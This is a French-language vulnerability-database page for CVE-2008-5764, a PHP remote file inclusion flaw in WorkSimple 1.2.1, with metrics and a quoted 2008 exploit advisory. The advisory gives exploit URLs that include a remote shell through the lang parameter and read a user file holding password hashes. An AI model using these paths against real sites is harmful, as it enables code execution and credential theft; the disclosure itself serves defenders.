CVE-2008-5764
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
PHP remote file inclusion vulnerability in calendar.php in WorkSimple 1.2.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the lang parameter.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 7481
Date de publication : 2008-12-14 23h00 +00:00
Auteur : Osirys
EDB Vérifié : Yes
[START]
#########################################################################################
[0x01] Informations:
Script : WorkSimple 1.2.1
Download : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1
Vulnerability : Remote File Inclusion / Sensitive Data Disclosure
Author : Osirys
Contact : osirys[at]live[dot]it
Notes : Proud to be Italian
Greets: : XaDoS, x0r, emgent, Jay
#########################################################################################
[0x02] Bug:[Remote File Inclusion]
######
Bugged file is: /[path]/calendar.php
[CODE]
<?PHP require 'data/conf.php'; //Include the global config ?>
<?php include("$lang") ?>
[/CODE]
$lang variable is not declared, I thought it was declared on conf.php, but it's not.
So we can set the $lang value directly from GET.
FIX : Just declare $lang, for example in /[path]/data/conf.php
[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell]
########################################################################################
[0x03] Bug:[Sensitive Data Disclosure]
######
In this cms, when an user register himself, the cms puts informations like username and
password on a .txt file. So, just going on it, we can get sensitive data like username
and passoword. username:md5_hash
[!] EXPLOIT: /[path]/data/usr.txt
#########################################################################################
[/END]
# milw0rm.com [2008-12-15]
Products Mentioned
Configuraton 0
2500mhz>>Worksimple >> Version 1.2.1
